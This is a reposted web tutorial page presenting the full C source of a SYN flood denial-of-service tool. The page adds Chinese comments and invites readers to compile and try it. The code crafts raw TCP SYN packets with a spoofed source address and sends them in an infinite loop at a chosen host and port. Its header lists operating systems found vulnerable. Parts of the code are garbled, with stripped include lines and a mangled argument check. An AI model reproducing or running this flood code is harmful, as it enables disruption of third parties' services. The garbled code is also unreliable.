Home  >  Article  >  Backend Development  >  Code analysis of a SYN attack--Used Gcc/RedHat Linux 9.0 compilation_PHP tutorial

Code analysis of a SYN attack--Used Gcc/RedHat Linux 9.0 compilation_PHP tutorial

WBOY
WBOYOriginal
2016-07-13 17:27:14899browse

Code analysis of a SYN attack--Used Gcc/RedHat Linux 9.0 compilation_PHP tutorialThis is an era of LINUX/UNIX, and you are still trying to understand a little bit of Java development. This is a source program for a SYN attack: Everyone, try reading it and see if you can understand it. If you don’t understand, it’s okay. Leave me a message E-MAIL: QIYU155·126. com. I added Chinese comments!
This is the source program of a SYN attack: Try reading it and see if you can understand it. If you don’t understand, you can leave me a message. I added Chinese comments./* Syn Attack against a port for Solaris */ /* Original land attack, land.c by m3lt, FLC */ /* Ported to 44BSD by blast and jerm */ /* Ported to Solaris by ziro antagonist */ /* Referenced flood.c by unknown author */ /* Converted into a syn attack against one port by CRG */ /* Please use this for educational purposes only */ /* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */ /* Additional notes: */ /* Successfully compiled on Solaris 2.51 and 2.6 */ /* Runs: synsol    */ /* */ /* Tested it on: Solaris 2.6 */ /* */ /* Attacked against: */ /* Linux 2.0.33 - vulnerable */ /* Linux 2.0.30 - vulnerable */ /* Linux 1.2.13 - vulnerable */ /* Solaris 2.4 - vulnerable */ /* Solaris 2.5.1 - vulnerable */ /* SunOS 4.1.3_U3 - vulnerable */ /* Solaris 2.6 - not vulnerable */ /* */ /* Most of these test machines are not patched because they */ /* are in test lab. I tested the program against port 23 and */ /* every once in awhile I did get through. */ /* */ /* Direct any comments, questions, improvements to */ /* packetstorm@genocide2600.com */ /* http://www.genocide2600.com/~tattooman/ */ /* Your emails will be forwarded to the author, who wishes */ /* to remain known only as CRG (no email addy or URL) */ /*jjgirl:上面的注释的不用说了!*/ #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  /*jjgirl:上面是头文件!*/   unsigned long srcport;   struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; /*jjgirl:定义一个伪装地址的结构!*/   u_short checksum(u_short * data,u_short length) { int nleft = length; int sum=0; unsigned short *w = data; unsigned short value = 0;   while (nleft > 1) { sum += *w++; nleft -= 2; }   if (nleft == 1) { *(unsigned char *) (&value) = *(unsigned char *) w; sum += value; } sum = (sum >>16) + (sum & 0xffff); sum += (sum >> 16); value = ~sum; return(value); } /*jjgirl:上面校验文件!包头是需要校验的,CRC校验!*/     int main(int argc,char * * argv) {/*jjgirl:主程序开始了!*/ struct sockaddr_in sin; struct sockaddr_in din; struct hostent * hoste; struct hostent * host1; int j,sock,foo, flooddot=1; char buffer[40]; struct ip * ipheader=(struct ip *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip)); struct pseudohdr pseudoheader; /*jjgirl:上面定义变量!*/   fprintf(stderr,"Syn attack against one port.(Infinite) ");   if(argch_addr,&din.sin_addr,host1->h_length); else if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1) { fprintf(stderr,"unknown source host %s ",argv[3]); return(-1); } if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown destination host %s ",argv[1]); return(-1); }   if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s ",argv[2]); return(-1); } /*jjgirl:上面是给sockaddr_in结构赋值,需要指明协议,端口号!*/       if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldnt allocate raw socket "); return(-1); } /*jjgirl:上面开始Socket了!*/   foo=1; if(setsockopt(sock,0,IP_HDRINCL,(char *)&foo,sizeof(int))==-1) { fprintf(stderr,"couldnt set raw header on socket "); return(-1); } /*jjgirl:上面是为了重构报头!*/   for(j=1;j>0;j++) { bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr)); ipheader->ip_v=4; ipheader->ip_tos=0; ipheader->ip_hl=sizeof(struct ip)/4; ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr); ipheader->ip_id=htons(random()); ipheader->ip_ttl=30; /*255;*/ ipheader->ip_p=IPPROTO_TCP; ipheader->ip_sum=0; ipheader->ip_src=din.sin_addr; ipheader->ip_dst=sin.sin_addr;   tcpheader->th_sport=htons(srcport); /*sin.sin_port;*/ tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0x28374839); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); tcpheader->th_sum=0;   bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=din.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); /*jjgirl:上面是重构报头!*/   srcport= (10000.0*random()/(15000+1.0)); /*jjgirl:端口当然要变!*/   if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) /*jjgirl:攻击开始!*/ { fprintf(stderr,"couldnt send packet,%d ",errno); return(-1); } usleep(2); if (!(flooddot = (flooddot+1)%(1)))   /*jjgirl:显示次数! Jjgirl 把上面一句,改为如下两句,增加显示效果,随你的便! int k=j; if((k%10)==0) printf(" "); */   } /*The end of the infinite loop*/ close(sock); return(0); } /*jjgirl:结束!编译试试吧!如果有看不懂可以给我留言,或E-MAIL:qiyu155@126.com!*/

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/531903.htmlTechArticle这是一个LINUX/UNIX的时代,你还在为自己懂一点点的 Java development..这是一个SYN攻击的源程序: 大家试着读一读,看是否能读懂,不懂可以给...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn